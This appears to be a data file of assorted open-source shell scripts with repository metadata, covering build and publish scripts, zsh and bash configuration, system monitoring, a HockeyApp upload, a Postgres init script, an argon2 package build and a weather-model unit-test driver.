if [[ "$CHAR" == 'w' ]]; then
zle vi-backward-word
LSEARCH=$CURSOR
zle vi-forward-word
RSEARCH=$CURSOR
RBUFFER="$BUFFER[$RSEARCH + 1, ${#BUFFER}]"
LBUFFER="$LBUFFER[1, $LSEARCH]"
return
elif [[ "$CHAR" == '(' ]] || [[ "$CHAR" == ')' ]] || [[ "$CHAR" == 'b' ]]; then
LCHAR="("
RCHAR=")"
elif [[ "$CHAR" == '[' ]] || [[ "$CHAR" == ']' ]]; then
LCHAR="["
RCHAR="]"
elif [[ $CHAR == '{' ]] || [[ $CHAR == '}' ]] || [[ "$CHAR" == 'B' ]]; then
LCHAR='{'
RCHAR='}'
else
LCHAR="$CHAR"
RCHAR="$CHAR"
fi
LSEARCH=${#LBUFFER}
while (( $LSEARCH > 0 )) && [[ "$LBUFFER[$LSEARCH]" != "$LCHAR" ]]; do
LSEARCH=$(expr $LSEARCH - 1)
done
if [[ "$LBUFFER[$LSEARCH]" != "$LCHAR" ]]; then
return
fi
RSEARCH=0
while [[ "$RSEARCH" < $(expr ${#RBUFFER} + 1 ) ]] && [[ "$RBUFFER[$RSEARCH]" != "$RCHAR" ]]; do
RSEARCH=$(expr $RSEARCH + 1)
done
if [[ "$RBUFFER[$RSEARCH]" != "$RCHAR" ]]; then
return
fi
RBUFFER="$RBUFFER[$RSEARCH, ${#RBUFFER}]"
LBUFFER="$LBUFFER[1, $LSEARCH]"
}
change-in() {
zle delete-in
zle vi-insert
}
delete-around() {
zle delete-in
zle vi-backward-char
zle vi-delete-char
zle vi-delete-char
}
change-around() {
zle delete-in
zle vi-backward-char
zle vi-delete-char
zle vi-delete-char
zle vi-insert
}
| true
|
8c333cb7d4fce0badf290e73aab30e25b83a0888
|
Shell
|
grails-plugins/grails-spring-security-oauth2-google
|
/travis-build.sh
|
UTF-8
| 516
| 3.09375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
set -e
rm -rf build
./gradlew -q clean check install --stacktrace
EXIT_STATUS=0
echo "branch: $TRAVIS_BRANCH"
echo "pull-request: $TRAVIS_PULL_REQUEST"
echo "travis tag: $TRAVIS_TAG"
if [[ -n $TRAVIS_TAG ]] || [[ $TRAVIS_BRANCH == 'master' && $TRAVIS_PULL_REQUEST == 'false' ]]; then
echo "Publishing archives ... "
if [[ -n $TRAVIS_TAG ]]; then
./gradlew bintrayUpload || EXIT_STATUS=$?
else
./gradlew publish || EXIT_STATUS=$?
fi
# ./publish-docs.sh
fi
| true
|
038f872786a0f6202591f091549b182cf9caa8c8
|
Shell
|
seanbreckenridge/dotfiles
|
/.local/scripts/generic/macho
|
UTF-8
| 875
| 3.703125
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Converted into bash from:
# https://hiphish.github.io/blog/2020/05/31/macho-man-command-on-steroids/
declare -rx FZF_DEFAULT_OPTS='
--height=30%
--layout=reverse
--prompt="Manual: "
--preview="man -Pcat {S} {1} 2>/dev/null"'
while getopts ":s:" opt; do
case $opt in
s)
SECTION="$OPTARG"
shift
shift
;;
\?)
echo "Invalid option: -${OPTARG}" >&2
exit 1
;;
:)
echo "Option -${OPTARG} requires an argument" >&2
exit 1
;;
esac
done
declare -a APROPROS_ARGS
APROPROS_ARGS=()
# if user wanted a particular section, use that
[[ -n "$SECTION" ]] && APROPROS_ARGS+=(-s "$SECTION")
# use what the user passed, else . (everything)
APROPROS_ARGS+=("${@:-.}")
declare manual
manual="$(apropos "${APROPROS_ARGS[@]}" |
grep -v -E '^.+ \(0\)' |
awk '{print $1}' |
sort |
fzf)" || exit $?
man "$manual"
printf '\r' # fix cursor location
| true
|
4434a65ff36a37ac0f544d1b86e2deb50862fa86
|
Shell
|
structbinary/AWSome
|
/monitor.sh
|
UTF-8
| 305
| 3.03125
| 3
|
[] |
no_license
|
#!/bin/bash
foldername=$(date +%Y-%m-%d-%H:%M:%S)
mkdir /home/ubuntu/logs/$foldername
cd /home/ubuntu/logs/
cd $foldername
free >> free.log
df >> df.log
vmstat >> vmstat.log
netstat >> netstat.log
ps >> ps.log
cd ..
zip -r --password accenturehack $foldername.zip $foldername
rm -rf $foldername
| true
|
c37b5aa8d3e232160423f0168fa59ffc655bdbbc
|
Shell
|
bilsaboob/nemerle
|
/tools/cs2n/convert
|
UTF-8
| 319
| 3.546875
| 4
|
[
"BSD-2-Clause"
] |
permissive
|
#!/bin/sh
DIR=`dirname $0`
ENGINE=`grep "^NET_ENGINE" ./$DIR/../../config.mak | awk '{print $3}'`
directory=
if [ "$#" -gt "0" ]; then
directory=$1
else
directory=tests
fi
for i in $directory/*.cs; do
echo "-----------$i-----------------";
$ENGINE ./cs2n.exe $i -out:`echo $i | sed 's/\.cs/\.n/g'`;
done;
| true
|
f014b73c911f8308deb6e1ce501355c641423fdf
|
Shell
|
jackbaty/ping-addresses
|
/ping-addresses.sh
|
UTF-8
| 227
| 3.03125
| 3
|
[] |
no_license
|
#!/bin/sh
# Stolen from Stackexchange. Don't remember the author, sorry.
awk '{print $1}' < $1 | while read ip; do
if ping -c1 $ip >/dev/null 2>&1; then
echo $ip IS UP
else
echo $ip IS DOWN
fi
done
| true
|
4f5e2831d92158f6327f2661dc6db3196db87647
|
Shell
|
yukinko-tea-room/milli-uni
|
/script/build-data.sh
|
UTF-8
| 402
| 2.515625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
SPREADSHEET_URL="https://docs.google.com/spreadsheets/d/1SuvJFStzTXDalw3PXHk8Cph3ewrHvYwDlKWWIRnSzfU/export"
UNIT_TO_IDOL_SHEET_ID="1100874764"
IDOL_TO_UNIT_SHEET_ID="1217692686"
wget -O unitToIdol.csv "${SPREADSHEET_URL}?format=csv&gid=${UNIT_TO_IDOL_SHEET_ID}"
wget -O idolToUnit.csv "${SPREADSHEET_URL}?format=csv&gid=${IDOL_TO_UNIT_SHEET_ID}"
./csvToJson.py
cp *.json ../src
| true
|
beb5a88f5b7e251cdbd0d3faaf753804871dd0dd
|
Shell
|
vassilikitsios/local_linear_stability_cpp
|
/tests/turbulent_channel/5stability_nonlinear_eddy/local_linear_stability.run
|
UTF-8
| 999
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/bash
# ----------------------------------------------------------------------------
# Some important filenames:
PROGRAM="local_linear_stability"
OUTPUT_FILE=${PROGRAM}".out"
ERROR_FILE=${PROGRAM}".err"
PROGRAM_BIN_DIR="/home/kit027/local_linear_stability_code/drivers/local_linear_stability/bin"
RESULTS_DIR="./results"
# ----------------------------------------------------------------------------
# Organise files:
rm -vrf $PROGRAM $OUTPUT_FILE $ERROR_FILE *~
mkdir $RESULTS_DIR
cp $PROGRAM_BIN_DIR/$PROGRAM .
# ----------------------------------------------------------------------------
# Running code:
echo "Running "$PROGRAM" code ..."
./$PROGRAM
#$PROGRAM 1>${PROGRAM}.out 2> ${PROGRAM}.err
# ----------------------------------------------------------------------------
# Generate images:
echo "Generating images..."
cd images
gnuplot plot_results.gp
ps2pdf results.eps
cd ..
echo "done."
echo " "
# ----------------------------------------------------------------------------
| true
|
b1ce9dc456e03507767e53dc6bab5d1fdfeb5b55
|
Shell
|
songyinghao/ionic-boilerplate
|
/env/scripts/upload-ios-hockeyapp.sh
|
UTF-8
| 891
| 3.0625
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
### ===================
# Upload app package to HockeyApp.
#
### ===================
if [ -z "$HOCKEY_APP_ID" -a -z "$HOCKEY_APP_TOKEN" ]; then
echo "Error: Missing HockeyApp App ID and App Token."
exit 1
fi
echo "iOS_BUILD = $iOS_BUILD"
if [ "$BUILD_APP" != true -o "$iOS_BUILD" != true ]; then
echo "Info: Can only run for iOS build. Skip~~~"
exit 0
fi
OUTPUTDIR="$PWD/platforms/ios/build/device/"
curl https://rink.hockeyapp.net/api/2/apps/$HOCKEY_APP_ID/app_versions/upload \
-F status="2" \
-F notify="0" \
-F notes="$RELEASE_NOTES" \
-F notes_type="0" \
-F ipa="@$OUTPUTDIR/$APP_NAME.ipa" \
-F dsym="@$OUTPUTDIR/$APP_NAME.dsym.zip" \
-F commit_sha="$TRAVIS_COMMIT" \
-H "X-HockeyAppToken: $HOCKEY_APP_TOKEN"
if [[ $? -ne 0 ]]; then
echo "Error: Failed to upload app package to HockeyApp"
exit 1
fi
| true
|
1bc8bb32061cc716ce436b344510efd25ab935e5
|
Shell
|
daktronics/debian-nginx
|
/debian/modules/http-uploadprogress/test/stress.sh
|
UTF-8
| 879
| 2.796875
| 3
|
[
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"BSD-4-Clause"
] |
permissive
|
#!/bin/sh
# Usage: stress.sh UPLOAD_URL PROGRESS_URL
#
i=0
LIMIT="10k"
FILE="100"
#trap 'kill_all' SIGINT SIGTERM
while [ "1" == "1" ]
do
for j in $(seq 5)
do
i=`expr $i + 1`
echo "Upload $i"
curl --limit-rate $LIMIT -F pouet=@$FILE $1?X-Progress-ID=$i &
sh client.sh $i $2 &
i=`expr $i + 1`
echo "Upload $i"
curl --limit-rate $LIMIT -F pouet=@$FILE $1?X-Progress-ID=$i &
sh client.sh $i $2 &
i=`expr $i + 1`
echo "Upload $i"
curl --limit-rate $LIMIT -F pouet=@$FILE $1?X-Progress-ID=$i &
sh client.sh $i $2 &
i=`expr $i + 1`
echo "Upload $i"
curl --limit-rate $LIMIT -F pouet=@$FILE $1?X-Progress-ID=$i &
sh client.sh $i $2 &
i=`expr $i + 1`
echo "Upload $i"
curl --limit-rate $LIMIT -F pouet=@$FILE $1?X-Progress-ID=$i &
sh client.sh $i $2 &
i=`expr $i + 1`
echo "Upload $i"
curl --limit-rate $LIMIT -F pouet=@$FILE $1?X-Progress-ID=$i &
sh client.sh $i $2 &
done
wait
done
| true
|
76032a3816ee7b3b4a1034a8161d9a0f82281bf4
|
Shell
|
qingqibing/go-3dobj
|
/build.sh
|
UTF-8
| 581
| 2.625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
me=$(basename "$0")
msg() {
echo >&2 "$me:" "$@"
}
gofmt -s -w ./*.go ./example
go tool fix ./*.go ./example
go vet . ./example
go install
#hash gosimple 2>/dev/null && gosimple ./*.go
hash golint 2>/dev/null && golint ./*.go
#hash staticcheck 2>/dev/null && staticcheck ./*.go
#hash gosimple 2>/dev/null && gosimple ./example/*.go
hash golint 2>/dev/null && golint ./example/*.go
#hash staticcheck 2>/dev/null && staticcheck ./example/*.go
go test
go test -bench=.
go mod tidy ;# remove non-required modules from dependencies
| true
|
ed47ee4231840aeddfdc95d525a826e23e987c99
|
Shell
|
cu-swe4s-fall-2019/trees-qyang13
|
/rand_word_generator.sh
|
UTF-8
| 463
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
WORDFILE="/usr/share/dict/words"
NUMWORDS=10000
# List of random words, with sorted key
tL=`awk 'NF!=0 {++c} END {print c}' $WORDFILE`
for i in `seq $NUMWORDS`
do
rnum=$((RANDOM%$tL+1))
echo $i,$(sed -n "$rnum p" $WORDFILE) >> non_rand.txt
done
# List of random words, with random key
tL=`awk 'NF!=0 {++c} END {print c}' $WORDFILE`
for i in `seq $NUMWORDS`
do
rnum=$((RANDOM%$tL+1))
echo $i,$(sed -n "$rnum p" $WORDFILE) >> rand.txt
done
| true
|
439f3349c42bde16878d92aa8835dea0c121c18d
|
Shell
|
giacomoalbe/config
|
/.bash_aliases
|
UTF-8
| 1,513
| 2.953125
| 3
|
[] |
no_license
|
#################
# ALIAS SECTION #
#################
alias dc=docker-compose
alias dcp="docker-compose -f docker-compose.prod.yml"
alias dl="docker-compose logs -f"
alias g=git
alias d=docker
alias t=tmux
alias vim=nvim
alias c=clear
alias ev="vim ~/.bashrc"
alias sv="source ~/.bashrc"
alias ea="vim ~/.bash_aliases"
alias tn="tmux new -s"
alias ta="tmux attach -t"
alias tk="tmux kill-session -t"
alias tl="tmux ls"
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'
alias pi="sudo pacman -S "
alias vl="io.elementary.vala-lint ."
alias open="xdg-open"
alias reloadkc="xmodmap ~/.Xmodmap"
alias config='/usr/bin/git --git-dir=$HOME/.myconf/ --work-tree=$HOME'
cd() { builtin cd "$@" && ls -lG ; }
alias ls="ls -h"
alias gs="git status"
alias ga="git add"
alias gc="git commit -m"
alias gl="git log --pretty=format:'%ad [%an] | %s' --date=format:'%d/%m/%y %H:%M'"
alias glh="git --no-pager log --pretty=tformat:'%ad %C(Yellow)%h%C(reset) %C(blue)[%an]%C(reset) | %s' --date=format:'%d/%m/%y %H:%M' -10"
alias glt="git log --pretty=format:'%h %ad | %s [%an]' --author=Giacomo --date=format:\"%d/%m/%y %H:%M\" --since=\$(date +%Y-%m-%d) | tee"
# Portusage
alias portusage="sudo netstat -tulpn"
# HLedger
alias hl="hledger"
# Add an "alert" alias for long running commands. Use like so:
# sleep 10; alert
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'
alias rfc="fc-cache -f -v"
| true
|
264777ef948e5c492698417803a1cab589331812
|
Shell
|
toborguru/beagleboard_navstack
|
/beagle_board/scripts/bb_backup_system_files
|
UTF-8
| 888
| 3.921875
| 4
|
[] |
no_license
|
#!/bin/bash
# Script written to monitor and control the DATA robot by Sawyer Larkin
NAME=`basename $0`
display_usage ()
{
echo "Usage: $NAME [options]" 1>&2
echo "" 1>&2
echo "Copies relevant system files that I have updated into this repository for backup." 1>&2
echo "" 1>&2
echo " -h Print this message" 1>&2
exit 1
}
while getopts "h" opt
do
case ${opt} in
h )
display_usage
;;
\? )
echo "Invalid option: $OPTARG" 1>&2
display_usage
;;
: )
echo "Invalid option: $OPTARG requires an argument" 1>&2
display_usage
;;
esac
done
shift $((OPTIND -1))
cp /etc/wpa_supplicant.conf ~/beagleboard_navstack/beagle_board/system_files/etc/
cp /etc/connman/main.conf ~/beagleboard_navstack/beagle_board/system_files/etc/connnman/
cp /etc/network/interfaces ~/beagleboard_navstack/beagle_board/system_files/etc/network/
| true
|
c471764fc6ee7c4e816f8bc9a2190558e12cc48a
|
Shell
|
jagadeesh800/local-repo
|
/scripts/s1.sh
|
UTF-8
| 121
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/bash
read -p 'enter y or n : ' x
if [ $x -ne "y" -o $x -ne "n" ]
then
echo "entered y or n"
else
fi
| true
|
852114b06ce4bfcb7ae23637b17e75966f2d45e2
|
Shell
|
AksV73/Os_lab_sem4
|
/lab3/qu3.sh
|
UTF-8
| 362
| 3.4375
| 3
|
[] |
no_license
|
echo "Enter your Name : "
read name
echo "Enter your Registration Number : "
read regNo
n=$#
s=($*)
echo "Array Before Sorting: "
echo "${s[*]}"
for ((i=0;i<$n;i++))
do
for((j=0;j<n-i-1;j++))
do
if [[ ${s[j]} > ${s[$((j+1))]} ]]
then
temp=${s[j]}
s[j]=${s[$((j+1))]}
s[$((j+1))]=$temp
fi
done
done
echo "Array after sorting: "
echo "${s[*]}"
| true
|
9397bd6cbafc97b6b13f81734e6631fe6fda87c3
|
Shell
|
ODEX-TOS/packages
|
/argon2/repos/core-x86_64/PKGBUILD
|
UTF-8
| 915
| 2.546875
| 3
|
[
"GPL-1.0-or-later",
"MIT"
] |
permissive
|
# Maintainer: Baptiste Jonglez <baptiste--aur at jonglez dot org>
pkgname=argon2
pkgver=20190702
pkgrel=3
pkgdesc='A password-hashing function (reference C implementation)'
arch=('x86_64')
url='https://github.com/P-H-C/phc-winner-argon2'
license=('Apache' 'custom:CC0')
depends=('glibc')
provides=('libargon2.so')
source=("https://github.com/P-H-C/phc-winner-argon2/archive/${pkgver}/${pkgname}-${pkgver}.tar.gz")
sha256sums=('daf972a89577f8772602bf2eb38b6a3dd3d922bf5724d45e7f9589b5e830442c')
build() {
cd "$srcdir/phc-winner-$pkgname-$pkgver"
make OPTTARGET='none' LIBRARY_REL='lib'
}
check() {
cd "$srcdir/phc-winner-$pkgname-$pkgver"
make OPTTARGET='none' LIBRARY_REL='lib' test
}
package() {
cd "$srcdir/phc-winner-$pkgname-$pkgver"
make OPTTARGET='none' LIBRARY_REL='lib' DESTDIR="$pkgdir" install
install -D -m0644 LICENSE "${pkgdir}/usr/share/licenses/argon2/LICENSE"
}
# vim:set ts=2 sw=2 et:
| true
|
92243282b7a401944432bd2a3152e48710e0cd37
|
Shell
|
b2gdev/Android-JB-4.1.2
|
/tcbin_misc/executables/set_wifi_mac
|
UTF-8
| 434
| 2.796875
| 3
|
[] |
no_license
|
#!/system/usr/bin/sh
if ! [[ -e /system/etc/firmware/ti-connectivity/random_mac_set ]]
then
echo "Creating new random MAC for WiFi"
macaddr=$(echo $RANDOM|md5sum|sed 's/^\(..\)\(..\)\(..\)\(..\)\(..\).*$/02:\1:\2:\3:\4:\5/')
mount -o remount,rw /system
calibrator set nvs_mac /system/etc/firmware/ti-connectivity/wl1271-nvs.bin $macaddr
touch /system/etc/firmware/ti-connectivity/random_mac_set
mount -o remount,ro /system
fi
| true
|
0b2e13a68831b9a6c7c08ae2737d47b87a8704ef
|
Shell
|
saboteur-team/Saboteur-Xbox360-Patcher
|
/compress.sh
|
UTF-8
| 1,118
| 3.0625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
echo "Compress started"
rm -fr /tmp/luascripts
cp -r ./luascripts /tmp/luascripts
rm -fr /tmp/run.bat
echo "Generate batch file"
for f in $(find /tmp/luascripts -name '*.lua' ! -iname 'BelleInteriorSceneManager.lua' ! -iname 'AggroSpawner.lua' ! -iname 'CoDSpawner.lua'); do
windowspath=$(sed 's/\/tmp\/luascripts/d\:/' <<< $f)
windowspath=$(sed "s/\//\\\/g" <<< $windowspath)
echo 'D:\luac.exe -o' "\"$windowspath\"" "\"$windowspath\"" >> /tmp/run.bat
done
echo "Execute batch file to generate lua bytecode"
cp ./tools/luac.exe /tmp/luascripts/luac.exe
wine64 cmd < /tmp/run.bat >> /dev/null
rm /tmp/luascripts/luac.exe
echo "Change the bytecode to Xbox360 system"
for f in $(find /tmp/luascripts -name '*.lua' ! -iname 'BelleInteriorSceneManager.lua' ! -iname 'AggroSpawner.lua' ! -iname 'CoDSpawner.lua'); do
lua5.1 ./tools/ChunkSpy-0.9.8/5.1/ChunkSpy.lua --auto "$f" --rewrite "saboteur" -o "$f.final"
mv "$f.final" "$f"
done
echo "Repackage luap"
cp LuaScripts.luap /tmp/LuaScripts.luap
./tools/quickbms -w -r ./luap-xbox360.bms /tmp/LuaScripts.luap /tmp/luascripts
| true
|
47a521c7aa0f03b42970adee07d99fef23bbf64b
|
Shell
|
pczapski/docker-stack
|
/docker/postgres/initdb.sh
|
UTF-8
| 477
| 2.625
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
echo "Creating DB"
psql -v ON_ERROR_STOP=1 --username "$POSTGRES_USER" --dbname "$POSTGRES_DB" <<-EOSQL
CREATE DATABASE example;
EOSQL
echo "Done Creating DB"
#!/bin/bash
set -e
echo "Creating DB"
psql -v ON_ERROR_STOP=1 --username "$POSTGRES_USER" --dbname "$POSTGRES_DB" <<-EOSQL
CREATE USER keycloak WITH PASSWORD 'password';
CREATE DATABASE keycloak;
GRANT ALL PRIVILEGES ON DATABASE keycloak TO keycloak;
EOSQL
echo "Done Creating DB"
| true
|
544b0f54c565b33f5929d4462236b85a6babf1f4
|
Shell
|
nevergosleep/pleaseDontCrashLinux
|
/Scripts/changeTheme
|
UTF-8
| 532
| 2.609375
| 3
|
[] |
no_license
|
#!/bin/bash
thm=$(echo "light;dark;dark_solid;sunset" | rofi -sep ";" -dmenu -i -p "Theme: ")
[[ -z $thm ]] && exit
rm ~/.Xresources
cp ~/.Themes/$thm/.Xresources ~/.Xresources
xrdb .Xresources
rm ~/.config/zathura/zathurarc
cp ~/.Themes/$thm/zathurarc ~/.config/zathura/zathurarc
rm ~/.config/rofi/config
cp ~/.Themes/$thm/rofi/config ~/.config/rofi/config
rm ~/.config/compton.conf
cp ~/.Themes/$thm/compton.conf ~/.config/compton.conf
rm ~/.config/i3/config
cp ~/.Themes/$thm/i3/config ~/.config/i3/config
i3 restart
exit 0
| true
|
d1a91376b8c675b4bcd6ef06e4102e0c40a86314
|
Shell
|
MinsukJi-NOAA/UnitTesting
|
/ut.sh
|
UTF-8
| 14,904
| 3.390625
| 3
|
[] |
no_license
|
#!/bin/bash
set -eux
SECONDS=0
hostname
error() {
echo
echo "$@" 1>&2
exit 1
}
usage() {
set +x
echo
echo "Usage: $program -n <test-name> [ -c <baseline-cases> | -r <unit-test-cases> ] [-k] [-h]"
echo
echo " -n specify <test-name>"
echo
echo " -c create new baseline results. <baseline-cases> is"
echo " either 'all' or any combination of 'std','32bit','debug'"
echo
echo " -r run unit tests. <unit-test-cases> is either 'all' or any combination"
echo " of 'std','thread','mpi','decomp','restart','32bit','debug'"
echo
echo " -k keep run directory"
echo
echo " -h display this help and exit"
echo
echo " Examples"
echo
echo " To create new baselines and run unit tests:"
echo " 'utest -n fv3_thompson' creates and runs all for fv3_thompson"
echo
echo " To create new baselines only:"
echo " 'utest -n fv3_control -c all' creates std, 32bit, debug for fv3_control"
echo " 'utest -n fv3_iau -c std,debug' creates std, debug for fv3_iau"
echo " 'utest -n fv3_gfdlmprad_gws -c 32bit' creates 32bit for fv3_gfdlmprad_gws"
echo
echo " To run unit tests only:"
echo " 'utest -n fv3_cpt -r all' runs std,thread,mpi,decomp,restart,32bit,debug for fv3_cpt"
echo " 'utest -n fv3_control -r thread,decomp' runs thread,decomp for fv3_control"
echo " 'utest -n fv3_stochy -r restart' runs restart for fv3_stochy"
echo
set -x
}
usage_and_exit() {
usage
exit $1
}
cleanup() {
rm -rf ${lockdir}
trap 0
exit
}
run_utests() {
for rc in $ut_run_cases; do
# Load namelist default and override values
source default_vars.sh
source ${PATHRT}/tests/$TEST_NAME
export RUN_SCRIPT
comp_nm=std
case $rc in
std)
RESTART_INTERVAL=12
;;
thread)
THRD=2
# INPES is sometimes odd, so use JNPES. Make sure JNPES is divisible by THRD
JNPES=$(( JNPES/THRD ))
TASKS=$(( INPES*JNPES*6 + WRITE_GROUP*WRTTASK_PER_GROUP ))
TPN=$(( TPN/THRD ))
NODES=$(( TASKS/TPN + 1 ))
;;
mpi)
JNPES=$(( JNPES/2 ))
TASKS=$(( INPES*JNPES*6 + WRITE_GROUP*WRTTASK_PER_GROUP ))
NODES=$(( TASKS/TPN + 1 ))
;;
decomp)
temp=$INPES
INPES=$JNPES
JNPES=$temp
;;
restart)
# These parameters are different for regional restart, and won't work
WARM_START=.T.
NGGPS_IC=.F.
EXTERNAL_IC=.F.
MAKE_NH=.F.
MOUNTAIN=.T.
NA_INIT=0
NSTF_NAME=2,0,1,0,5
LIST_FILES="RESTART/coupler.res RESTART/fv_core.res.nc RESTART/fv_core.res.tile1.nc \
RESTART/fv_core.res.tile2.nc RESTART/fv_core.res.tile3.nc
RESTART/fv_core.res.tile4.nc RESTART/fv_core.res.tile5.nc \
RESTART/fv_core.res.tile6.nc RESTART/fv_srf_wnd.res.tile1.nc \
RESTART/fv_srf_wnd.res.tile2.nc RESTART/fv_srf_wnd.res.tile3.nc \
RESTART/fv_srf_wnd.res.tile4.nc RESTART/fv_srf_wnd.res.tile5.nc \
RESTART/fv_srf_wnd.res.tile6.nc RESTART/fv_tracer.res.tile1.nc \
RESTART/fv_tracer.res.tile2.nc RESTART/fv_tracer.res.tile3.nc \
RESTART/fv_tracer.res.tile4.nc RESTART/fv_tracer.res.tile5.nc \
RESTART/fv_tracer.res.tile6.nc RESTART/phy_data.tile1.nc \
RESTART/phy_data.tile2.nc RESTART/phy_data.tile3.nc RESTART/phy_data.tile4.nc \
RESTART/phy_data.tile5.nc RESTART/phy_data.tile6.nc RESTART/sfc_data.tile1.nc \
RESTART/sfc_data.tile2.nc RESTART/sfc_data.tile3.nc RESTART/sfc_data.tile4.nc \
RESTART/sfc_data.tile5.nc RESTART/sfc_data.tile6.nc"
if [[ $OUTPUT_FILE == "'netcdf'" ]]; then
LIST_FILES="phyf024.tile1.nc phyf024.tile2.nc phyf024.tile3.nc phyf024.tile4.nc \
phyf024.tile5.nc phyf024.tile6.nc dynf024.tile1.nc dynf024.tile2.nc \
dynf024.tile3.nc dynf024.tile4.nc dynf024.tile5.nc dynf024.tile6.nc ${LIST_FILES}"
elif [[ $OUTPUT_FILE == "'nemsio'" ]]; then
LIST_FILES="phyf024.nemsio dynf024.nemsio ${LIST_FILES}"
fi
;;
32bit)
comp_nm=$rc
;;
debug)
comp_nm=$rc
;;
esac
echo "case: $rc; THRD: $THRD; INPES: $INPES; JNPES: $JNPES; TASKS: $TASKS; TPN: $TPN; NODES: $NODES"
RT_SUFFIX="_$rc"
BL_SUFFIX="_$comp_nm"
cat <<- EOF > ${RUNDIR_ROOT}/run_test_$rc.env
export MACHINE_ID=${MACHINE_ID}
export RTPWD=${RTPWD}
export PATHRT=${PATHRT}
export PATHTR=${PATHTR}
export NEW_BASELINE=${NEW_BASELINE}
export CREATE_BASELINE=${CREATE_BASELINE}
export RT_SUFFIX=${RT_SUFFIX}
export BL_SUFFIX=${BL_SUFFIX}
export SCHEDULER=${SCHEDULER}
export ACCNR=${ACCNR}
export QUEUE=${QUEUE}
export ROCOTO=${ROCOTO}
export LOG_DIR=${LOG_DIR}
EOF
./run_test.sh $PATHRT $RUNDIR_ROOT $TEST_NAME $rc $comp_nm > $LOG_DIR/run_${TEST_NAME}_$rc.log 2>&1
done
}
trap 'echo utest interrupted; cleanup' INT
trap 'echo utest quit; cleanup' QUIT
trap 'echo utest terminated; cleanup' TERM
trap 'echo utest error on line $LINENO; cleanup' ERR
trap 'echo utest finished; cleanup' EXIT
########################################################################
#### PROGRAM STARTS ####
########################################################################
readonly program=$(basename $0)
[[ $# -eq 0 ]] && usage_and_exit 1
# Default compiler: intel
export COMPILER=${NEMS_COMPILER:-intel}
# detect_machine sets ACCNR and MACHINE_ID
source detect_machine.sh
# PATHRT - Path to unit tests directory
readonly PATHRT=$(cd $(dirname $0) && pwd -P)
cd $PATHRT
# PATHTR - Path to trunk directory
readonly PATHTR=$(cd ${PATHRT}/.. && pwd)
# make sure only one instance of utest is running
readonly lockdir=${PATHRT}/lock
if mkdir $lockdir 2>/dev/null; then
echo $(hostname) $$ > ${lockdir}/PID
else
error "Only one instance of utest can be running at a time"
fi
# Log directory
LOG_DIR=${PATHRT}/log_ut_$MACHINE_ID
rm -rf ${LOG_DIR}
mkdir ${LOG_DIR}
# ROCOTO, ECFLOW not used, but defined for compatibility with rt_fv3.sh
ROCOTO=false
ECFLOW=false
# Machine-dependent libraries, modules, variables, etc.
if [[ $MACHINE_ID = hera.* ]]; then
export NCEPLIBS=/scratch1/NCEPDEV/global/gwv/l819/lib
source $PATHTR/NEMS/src/conf/module-setup.sh.inc
module use $PATHTR/modulefiles/${MACHINE_ID}
module load fv3
COMPILER=${NEMS_COMPILER:-intel} # in case compiler gets deleted by module purge
QUEUE=debug
dprefix=/scratch1/NCEPDEV
DISKNM=$dprefix/nems/emc.nemspara/RT
STMP=${dprefix}/stmp4
PTMP=${dprefix}/stmp2
SCHEDULER=slurm
cp fv3_conf/fv3_slurm.IN_hera fv3_conf/fv3_slurm.IN
else
error "Unknown machine ID. Edit detect_machine.sh file"
fi
CREATE_BASELINE=true
baseline_cases=
run_unit_test=true
unit_test_cases=
TEST_NAME=
keep_rundir=false
# Parse command line arguments
while getopts :c:r:n:kh opt; do
case $opt in
c)
run_unit_test=false
if [ $OPTARG = all ]; then
baseline_cases=std,32bit,debug
else
baseline_cases=$OPTARG
fi
baseline_cases=$(echo $baseline_cases | sed -e 's/^ *//' -e 's/ *$//' -e 's/,/ /g')
for i in $baseline_cases
do
if [[ $i != std && $i != 32bit && $i != debug ]]; then
error "Invalid baseline_cases specified: $i"
fi
done
;;
r)
CREATE_BASELINE=false
if [ $OPTARG = all ]; then
unit_test_cases=std,thread,mpi,decomp,restart,32bit,debug
else
unit_test_cases=$OPTARG
fi
unit_test_cases=$(echo $unit_test_cases | sed -e 's/^ *//' -e 's/ *$//' -e 's/,/ /g')
for i in $unit_test_cases
do
if [[ $i != std && $i != thread && $i != mpi && $i != decomp && \
$i != restart && $i != 32bit && $i != debug ]]; then
error "Invalid unit_test_cases specified: $i"
fi
done
;;
n)
TEST_NAME=$OPTARG
#echo "test-name = $TEST_NAME"
;;
k)
keep_rundir=true
;;
h)
usage_and_exit 0
;;
'?')
error "$program: invalid option -$OPTARG"
;;
esac
done
# TEST_NAME is a required argument
if [ -z $TEST_NAME ]; then
error "$program: please specify test-name. Try 'utest -h' for usage."
fi
# Default where neither -c nor -r is specified: compile and run all cases
if [[ $CREATE_BASELINE == true && run_unit_test == true ]]; then
baseline_cases=std,32bit,debug
unit_test_cases=std,thread,mpi,decomp,restart,32bit,debug
fi
echo "baseline_cases = $baseline_cases"
echo "unit_test_cases = $unit_test_cases"
# Fill in ut_compile_cases & ut_run_cases based on baseline_cases & unit_test_cases
# Cases are sorted in the order: std,thread,mpi,decomp,restart,32bit,debug
ut_compile_cases=
ut_run_cases=
if [[ $CREATE_BASELINE == true && $run_unit_test == true ]]; then
ut_compile_cases="1std 232bit 3debug"
ut_run_cases="1std 2thread 3mpi 4decomp 5restart 632bit 7debug"
elif [[ $CREATE_BASELINE == true && $run_unit_test == false ]]; then
for i in $baseline_cases; do
case $i in
std)
ut_compile_cases+=" 1$i"
ut_run_cases+=" 1$i"
;;
32bit)
ut_compile_cases+=" 2$i"
ut_run_cases+=" 2$i"
;;
debug)
ut_compile_cases+=" 3$i"
ut_run_cases+=" 3$i"
;;
esac
done
